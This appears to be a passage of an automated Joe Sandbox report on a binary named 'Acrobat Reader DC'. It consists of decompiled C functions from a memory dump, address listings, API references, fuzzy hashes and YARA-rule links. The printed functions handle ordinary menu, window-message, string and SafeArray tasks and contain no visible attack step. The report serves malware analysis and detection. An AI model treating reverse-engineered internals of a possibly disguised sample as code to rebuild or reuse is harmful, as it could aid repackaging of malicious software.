                                  0x0042f476
                                  0x0042f465
                                  0x0042f416
                                  0x0042f41a
                                  0x0042f420
                                  0x0042f424
                                  0x0042f42a
                                  0x0042f42e
                                  0x0042f42f
                                  0x0042f432
                                  0x0042f436
                                  0x00000000
                                  0x00000000
                                  0x0042f438
                                  0x00000000
                                  0x0042f436
                                  0x0042f440
                                  0x00000000
                                  0x00000000
                                  0x0042f440
                                  0x0042f424
                                  0x00000000
                                  0x0042f41a
                                  0x0042f3da
                                  0x0042f3da
                                  0x0042f3dd
                                  0x0042f3e0
                                  0x0042f3e4
                                  0x0042f706
                                  0x0042f706
                                  0x0042f709
                                  0x0042f70d
                                  0x0042f714
                                  0x0042f3ea
                                  0x0042f3ea
                                  0x0042f3f2
                                  0x0042f3f3
                                  0x0042f3f6
                                  0x0042f3fa
                                  0x00000000
                                  0x0042f3fc
                                  0x0042f3fc
                                  0x0042f400
                                  0x0042f40a
                                  0x0042f40a
                                  0x00000000
                                  0x0042f3fa
                                  0x00000000
                                  0x0042f3ea
                                  0x0042f3e4
                                  0x0042f3c3
                                  0x0042f3c3
                                  0x0042f3c6
                                  0x0042f3c9
                                  0x00000000
                                  0x0042f3c9
                                  0x0042f71e
                                  0x0042f71e
                                  0x0042f71f
                                  0x0042f723
                                  0x0042f446
                                  0x0042f446
                                  0x0042f447
                                  0x00000000
                                  0x0042f738
                                  0x0042f738
                                  0x0042f738
                                  0x0042f738
                                  0x0042f723
                                  0x0042f3b0
                                  0x0042f3b0
                                  0x0042f3b3
                                  0x00000000
                                  0x0042f3b3
                                  0x0042f3aa
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _strncmp
                                  • String ID: Q\E
                                  • API String ID: 909875538-2189900498
                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004440E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E004440E0(int _a4, intOrPtr* _a8, int _a12) {
				struct tagMENUITEMINFOW _v52;
				void* __edi;
				void* __esi;
				int _t28;
				signed int _t30;
				intOrPtr _t34;
				signed int _t35;
				signed int _t38;
				int _t42;
				struct HMENU__* _t52;
				signed int* _t55;

				_t28 = _a4;
				_t55 = _a12;
				_a12 = 0xffffffff;
				if(_t28 == 5 || _t28 == 6) {
					__eflags = 0;
					return 0;
				} else {
					if(_t28 == 3 || _t28 == 4) {
						_t42 = _t28;
						goto L8;
					} else {
						if(E00434179(0x4a8710, _t28,  &_a12) != 0) {
							_t42 = _a12;
							L8:
							_t30 =  *(0x4a88c4 + _t42 * 4);
							 *_t55 = 0;
							__eflags = _t30;
							if(_t30 == 0) {
								goto L5;
							} else {
								_t52 =  *_t30;
								_v52.cbSize = 0x30;
								E00412F40( &(_v52.fMask), 0, 0x2c);
								__eflags = _t52;
								if(__eflags == 0) {
									L24:
									__eflags = 0;
									return 0;
								} else {
									_push(0x208);
									_t34 = E004115D7(_t52, _t55, __eflags);
									 *_a8 = _t34;
									_v52.fMask = 0x11;
									_v52.dwTypeData = _t34;
									_v52.cch = 0x104;
									_t35 = GetMenuItemInfoW(_t52, _t42, 0,  &_v52);
									__eflags = _t35;
									if(_t35 == 0) {
										L23:
										_push( *_a8);
										E004111DC();
										goto L24;
									} else {
										__eflags = _v52.fType & 0x00000800;
										if((_v52.fType & 0x00000800) != 0) {
											goto L23;
										} else {
											_t38 = _v52.fState;
											__eflags = _t38 & 0x00000003;
											if((_t38 & 0x00000003) == 0) {
												 *_t55 =  *_t55 | 0x00000040;
												__eflags =  *_t55;
											} else {
												 *_t55 =  *_t55 | 0x00000080;
											}
											__eflags = _t38 & 0x00008080;
											if((_t38 & 0x00008080) != 0) {
												 *_t55 =  *_t55 | 0x00000100;
												__eflags =  *_t55;
											}
											__eflags = _t38 & 0x00000008;
											if((_t38 & 0x00000008) == 0) {
												 *_t55 =  *_t55 | 0x00000004;
												__eflags =  *_t55;
											} else {
												 *_t55 =  *_t55 | 0x00000001;
											}
											__eflags = _t38 & 0x00001000;
											if((_t38 & 0x00001000) != 0) {
												 *_t55 =  *_t55 | 0x00000200;
												__eflags =  *_t55;
											}
											return 1;
										}
									}
								}
							}
						} else {
							L5:
							return 0;
						}
					}
				}
			}














                                  0x004440e6
                                  0x004440ea
                                  0x004440ed
                                  0x004440f7
                                  0x00444205
                                  0x0044420b
                                  0x00444106
                                  0x0044410a
                                  0x0044412e
                                  0x00000000
                                  0x00444111
                                  0x00444122
                                  0x00444132
                                  0x00444135
                                  0x00444135
                                  0x0044413c
                                  0x00444142
                                  0x00444144
                                  0x00000000
                                  0x00444146
                                  0x00444147
                                  0x00444151
                                  0x00444158
                                  0x00444160
                                  0x00444162
                                  0x004441fa
                                  0x004441fc
                                  0x00444202
                                  0x00444168
                                  0x00444168
                                  0x0044416d
                                  0x00444180
                                  0x00444182
                                  0x00444189
                                  0x0044418c
                                  0x00444193
                                  0x00444199
                                  0x0044419b
                                  0x004441ec
                                  0x004441f1
                                  0x004441f2
                                  0x00000000
                                  0x0044419d
                                  0x0044419d
                                  0x004441a4
                                  0x00000000
                                  0x004441a6
                                  0x004441a6
                                  0x004441a9
                                  0x004441ab
                                  0x004441b5
                                  0x004441b5
                                  0x004441ad
                                  0x004441ad
                                  0x004441ad
                                  0x004441b8
                                  0x004441bd
                                  0x004441bf
                                  0x004441bf
                                  0x004441bf
                                  0x004441c5
                                  0x004441c7
                                  0x004441ce
                                  0x004441ce
                                  0x004441c9
                                  0x004441c9
                                  0x004441c9
                                  0x004441d1
                                  0x004441d6
                                  0x004441d8
                                  0x004441d8
                                  0x004441d8
                                  0x004441e9
                                  0x004441e9
                                  0x004441a4
                                  0x0044419b
                                  0x00444162
                                  0x00444124
                                  0x00444124
                                  0x0044412b
                                  0x0044412b
                                  0x00444122
                                  0x0044410a

                                  APIs
                                  • _memset.LIBCMT ref: 00444158
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00444193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu_memset
                                  • String ID: 0
                                  • API String ID: 2223754486-4108050209
                                  • Opcode ID: 01492e4d25bc2bd65c26aecb51fb71c87790512efaa9bc24c35de0538d27af29
                                  • Instruction ID: 58443bb6ec7987cf46203e674686192f5cc98237d9d33e2b35fa29f462c9b90c
                                  • Opcode Fuzzy Hash: 01492e4d25bc2bd65c26aecb51fb71c87790512efaa9bc24c35de0538d27af29
                                  • Instruction Fuzzy Hash: 9631E3715002049BF720CF58DC89BAAB7A8FB99310F14451FED41D62A0EBB99990CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044835A(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v12;
				int _v20;
				int _v24;
				intOrPtr _v32;
				void _v48;
				void _v92;
				long _v96;
				void* _v100;
				intOrPtr _t46;
				intOrPtr _t47;
				long _t50;
				struct HWND__** _t53;
				long _t55;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr _t67;
				struct HWND__* _t68;
				intOrPtr _t79;
				struct HWND__* _t84;

				if(E00441AF5(0x4a8630, _a16,  &_a16,  &_v8) != 0) {
					_t63 =  *0x4a8690; // 0x0
					_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + _a16 * 4))));
					if( *((intOrPtr*)(_t59 + 0x1b0)) == 0) {
						goto L1;
					} else {
						_t46 =  *((intOrPtr*)(_t59 + 0x1b8));
						_v48 = 5;
						if(_t46 >= 0 ||  *((intOrPtr*)(_t59 + 0x1bc)) >= 0) {
							_v48 = 0x27;
							_v24 = 0;
							_v20 = 0;
						}
						if(_t46 >= 0) {
							_v20 = _t46;
						}
						_t47 =  *((intOrPtr*)(_t59 + 0x1bc));
						if(_t47 >= 0) {
							_v24 = _t47;
						}
						_v12 = _a8;
						_v32 = _a12;
						memcpy( &_v92,  &_v48, 0xa << 2);
						_t50 =  *(_t59 + 0x1b4);
						_v96 = 0xffff0001;
						if(_t50 != 0) {
							_v96 = _t50;
						}
						_t67 =  *0x4a86a4; // 0xa71980
						_t53 =  *( *(_t67 + _v8 * 4));
						_t68 = _t53[0x22];
						if(_t68 != 0x10) {
							_t84 = _t53[0xc];
						} else {
							_t84 =  *_t53;
						}
						if(_t68 != 0x10) {
							_v100 = _t53[3];
						} else {
							_v100 = 0xffff0000;
						}
						_t55 = SendMessageW(_t84, 0x1132, 0,  &_v100);
						_t79 = _a4;
						 *(_t79 + 0xc) = _t55;
						 *(_t79 + 0x30) = _t84;
						 *((short*)(_t79 + 0x80)) = SendMessageW(_t84, 0x1105, 0, 0);
						 *(_t59 + 0x1b4) =  *(_t79 + 0xc);
						return 1;
					}
				} else {
					L1:
					return 0;
				}
			}























                                  0x0044837b
                                  0x0044838b
                                  0x00448394
                                  0x0044839e
                                  0x00000000
                                  0x004483a0
                                  0x004483a0
                                  0x004483a6
                                  0x004483af
                                  0x004483b9
                                  0x004483c0
                                  0x004483c3
                                  0x004483c3
                                  0x004483c8
                                  0x004483ca
                                  0x004483ca
                                  0x004483cd
                                  0x004483d5
                                  0x004483d7
                                  0x004483d7
                                  0x004483e0
                                  0x004483e3
                                  0x004483f1
                                  0x004483f3
                                  0x004483f9
                                  0x00448402
                                  0x00448404
                                  0x00448404
                                  0x00448407
                                  0x00448413
                                  0x00448415
                                  0x0044841e
                                  0x00448424
                                  0x00448420
                                  0x00448420
                                  0x00448420
                                  0x0044842a
                                  0x00448438
                                  0x0044842c
                                  0x0044842c
                                  0x0044842c
                                  0x00448446
                                  0x0044844c
                                  0x00448459
                                  0x0044845c
                                  0x00448468
                                  0x00448471
                                  0x0044847d
                                  0x0044847d
                                  0x0044837d
                                  0x0044837d
                                  0x00448385
                                  0x00448385

                                  APIs
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: '
                                  • API String ID: 3850602802-1997036262
                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E0040BD80(void* __eax, signed int __ebx, intOrPtr* __ecx, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				intOrPtr _t38;
				intOrPtr* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				intOrPtr _t44;
				signed int _t59;
				void* _t80;
				intOrPtr* _t83;
				void* _t85;
				void* _t86;
				void* _t95;

				_t95 = __fp0;
				_t59 = __ebx;
				_push(__ecx);
				_t80 = __eax;
				_t83 = __ecx;
				if(__eax == 0) {
					L7:
					return _t83;
				}
				_t38 =  *((intOrPtr*)(_a4 + 4));
				if(__ebx >= _t38) {
					goto L7;
				}
				if(__eax != 0xffffffff) {
					__eflags = __ebx + __eax - _t38;
					if(__eflags <= 0) {
						L4:
						_t3 = _t83 + 0xc; // 0xd0558b1d
						_t39 =  *_t3;
						if( *_t39 > 1) {
							 *_t39 =  *_t39 - 1;
							_push(4);
							_t40 = E004115D7(_t80, _t83, __eflags);
							_t86 = _t85 + 4;
							__eflags = _t40;
							if(_t40 == 0) {
								_t40 = 0;
							} else {
								 *_t40 = 1;
							}
							_t17 = _t83 + 4; // 0x74000049
							 *(_t83 + 0xc) = _t40;
							_t20 = _t80 + 1; // 0x7400004a
							_t41 =  *_t17 + _t20;
							 *(_t83 + 8) = _t41;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = 8;
							} else {
								_t42 = (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3) + (_t41 + 7 >> 3);
								__eflags = _t42;
							}
							 *(_t83 + 8) = _t42;
							_push( ~(0 | __eflags > 0x00000000) | _t42 * 0x00000002);
							_t44 = E004115D7(_t80, _t83, __eflags);
							_t29 = _t83 + 4; // 0x74000049
							_t31 =  *_t29 + 2; // 0x7400004b
							_v8 = _t44;
							E00410E60(_t44,  *_t83,  *_t29 + _t31);
							_t85 = _t86 + 0x10;
							 *_t83 = _v8;
							L6:
							_t6 = _t83 + 4; // 0x74000049
							E00410E60( *_t83 +  *_t6 * 2,  *_a4 + _t59 * 2, _t80 + _t80);
							 *(_t83 + 4) =  *(_t83 + 4) + _t80;
							_t14 = _t83 + 4; // 0x74000049
							 *((short*)( *_t83 +  *_t14 * 2)) = 0;
							goto L7;
						}
						_t4 = _t83 + 4; // 0x74000049
						E00402F00( *_t4 + _t80, _t83, _t95);
						goto L6;
					}
				}
				_t80 = _t38 - _t59;
				goto L4;
			}


















                                  0x0040bd80
                                  0x0040bd80
                                  0x0040bd83
                                  0x0040bd86
                                  0x0040bd88
                                  0x0040bd8c
                                  0x0040bde3
                                  0x0040bdea
                                  0x0040bdea
                                  0x0040bd91
                                  0x0040bd96
                                  0x00000000
                                  0x00000000
                                  0x0040bd9b
                                  0x00426cda
                                  0x00426cdc
                                  0x0040bda5
                                  0x0040bda5
                                  0x0040bda5
                                  0x0040bdab
                                  0x0040bded
                                  0x0040bdef
                                  0x0040bdf1
                                  0x0040bdf6
                                  0x0040bdf9
                                  0x0040bdfb
                                  0x0040be5e
                                  0x0040bdfd
                                  0x0040bdfd
                                  0x0040bdfd
                                  0x0040be03
                                  0x0040be06
                                  0x0040be09
                                  0x0040be09
                                  0x0040be0d
                                  0x0040be10
                                  0x0040be12
                                  0x00426ce7
                                  0x0040be18
                                  0x0040be22
                                  0x0040be22
                                  0x0040be22
                                  0x0040be26
                                  0x0040be37
                                  0x0040be38
                                  0x0040be3d
                                  0x0040be40
                                  0x0040be49
                                  0x0040be4c
                                  0x0040be54
                                  0x0040be57
                                  0x0040bdb7
                                  0x0040bdbc
                                  0x0040bdcd
                                  0x0040bdd2
                                  0x0040bdd5
                                  0x0040bddf
                                  0x00000000
                                  0x0040bddf
                                  0x0040bdad
                                  0x0040bdb2
                                  0x00000000
                                  0x0040bdb2
                                  0x00426ce2
                                  0x0040bda3
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: f964171bc22d0a42f16369dbad18f2cd434c0b18babede9fc6fedef28322a13d
                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                  • Opcode Fuzzy Hash: f964171bc22d0a42f16369dbad18f2cd434c0b18babede9fc6fedef28322a13d
                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00444006(int _a4, signed int _a8) {
				struct tagMENUITEMINFOW _v52;
				intOrPtr _t27;
				intOrPtr* _t29;
				signed int _t36;
				int _t39;

				_t29 = _a8;
				_t39 = _a4;
				_a8 = 0xffffffff;
				if(_t39 != 0) {
					if(_t39 == 5 || _t39 == 6) {
						return 0;
					} else {
						if(_t39 == 3 || _t39 == 4) {
							_t36 = _t39;
							goto L10;
						} else {
							if(E00434179(0x4a8710, _t39,  &_a8) != 0) {
								_t36 = _a8;
								L10:
								if( *(0x4a88c4 + _t36 * 4) == 0 || ( *(0x4a88c4 + _t36 * 4))[1] == 0) {
									goto L7;
								} else {
									_v52.cbSize = 0x30;
									E00412F40( &(_v52.fMask), 0, 0x2c);
									_v52.fMask = 4;
									if(GetMenuItemInfoW( *( *(0x4a88c4 + _t36 * 4)), _t39, 0,  &_v52) == 0) {
										goto L7;
									} else {
										 *_t29 = _v52.hSubMenu;
										return 1;
									}
								}
							} else {
								L7:
								return 0;
							}
						}
					}
				} else {
					_t27 =  *0x4a8710; // 0x800d9
					 *_t29 = _t27;
					return _t39 + 1;
				}
			}








                                  0x0044400d
                                  0x00444011
                                  0x00444014
                                  0x0044401d
                                  0x00444034
                                  0x004440dd
                                  0x00444043
                                  0x00444047
                                  0x0044406c
                                  0x00000000
                                  0x0044404e
                                  0x0044405f
                                  0x00444070
                                  0x00444073
                                  0x0044407b
                                  0x00000000
                                  0x0044408a
                                  0x00444092
                                  0x00444099
                                  0x004440a5
                                  0x004440c1
                                  0x00000000
                                  0x004440c3
                                  0x004440c8
                                  0x004440d3
                                  0x004440d3
                                  0x004440c1
                                  0x00444061
                                  0x00444061
                                  0x00444069
                                  0x00444069
                                  0x0044405f
                                  0x00444047
                                  0x0044401f
                                  0x0044401f
                                  0x00444024
                                  0x0044402e
                                  0x0044402e

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 3577af1d957b7204fdd46e1a4f9341c5b1a9bc6f86c8f2c685067796396eaca7
                                  • Instruction ID: 69519e99fff9c3611eeaecbf8f45cf93f87690a028603bc06d4aa4e0618ad1d9
                                  • Opcode Fuzzy Hash: 3577af1d957b7204fdd46e1a4f9341c5b1a9bc6f86c8f2c685067796396eaca7
                                  • Instruction Fuzzy Hash: 92210D7290011457EB20DF4CEC84BEBB764F79A320F44412FEE5897290D779A854C7D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID: <local>
                                  • API String ID: 2038078732-4266983199
                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044CE43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0044CE43(void* __ecx, void* __eflags, char _a4) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				signed int _t20;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;

				_t28 =  *((intOrPtr*)(E00432520( &_a4) + 8));
				_t18 = E00443106( &_a4);
				_v8 = _t18;
				_t20 = _t18 - 1 >> 2;
				_t41 = (4 + _t20 * 4 >> 2) + 2;
				__imp__#411(0x13, 0, _t41, _t34, _t38, _t27, __ecx);
				_t35 = _t20;
				if(_t35 == 0) {
					E00408F40(_t35,  &_a4);
					return 0;
				} else {
					_t8 = _t35 + 0x20; // 0x20
					 *((intOrPtr*)(_t35 + 0x18)) = 0x73747263;
					 *((intOrPtr*)(_t35 + 0x1c)) = _t28;
					 *((intOrPtr*)(_t35 + 0x14 + _t41 * 4)) = 0;
					E00410E60(_t8, _t28, _v8);
					E00408F40(_t35,  &_a4);
					return _t35;
				}
			}














                                  0x0044ce53
                                  0x0044ce5a
                                  0x0044ce5f
                                  0x0044ce63
                                  0x0044ce70
                                  0x0044ce78
                                  0x0044ce7e
                                  0x0044ce82
                                  0x0044cebd
                                  0x0044ceca
                                  0x0044ce84
                                  0x0044ce88
                                  0x0044ce8c
                                  0x0044ce93
                                  0x0044ce97
                                  0x0044ce9f
                                  0x0044ceaa
                                  0x0044ceb7
                                  0x0044ceb7

                                  APIs
                                  • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 0044CE78
                                  • _memmove.LIBCMT ref: 0044CE9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayCreateSafeVector_memmove
                                  • String ID: crts
                                  • API String ID: 564309351-3724388283
                                  • Opcode ID: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                  • Instruction ID: ae18a0e6088bde325f2b8f87e65bbb2aaade0ee39655e70765b31d945e00dc0b
                                  • Opcode Fuzzy Hash: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                  • Instruction Fuzzy Hash: 7B0122B390010CABD700DF5AEC41E9B77A8EB84300F00412BFA08D7241EB31EA52C7E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004321A4(intOrPtr _a4, signed int* _a8) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed int _v8;
				char _v12;
				signed int _t21;
				intOrPtr _t39;

				_t39 = _a4;
				if( *((intOrPtr*)(_t39 + 0x14)) != 1) {
					E00414D04( &_v12, 1, 8,  *((intOrPtr*)(_t39 + 0x1c)));
				} else {
					E00410E60( &_v12,  *((intOrPtr*)(_t39 + 0xc)) +  *((intOrPtr*)(_t39 + 4)), 8);
				}
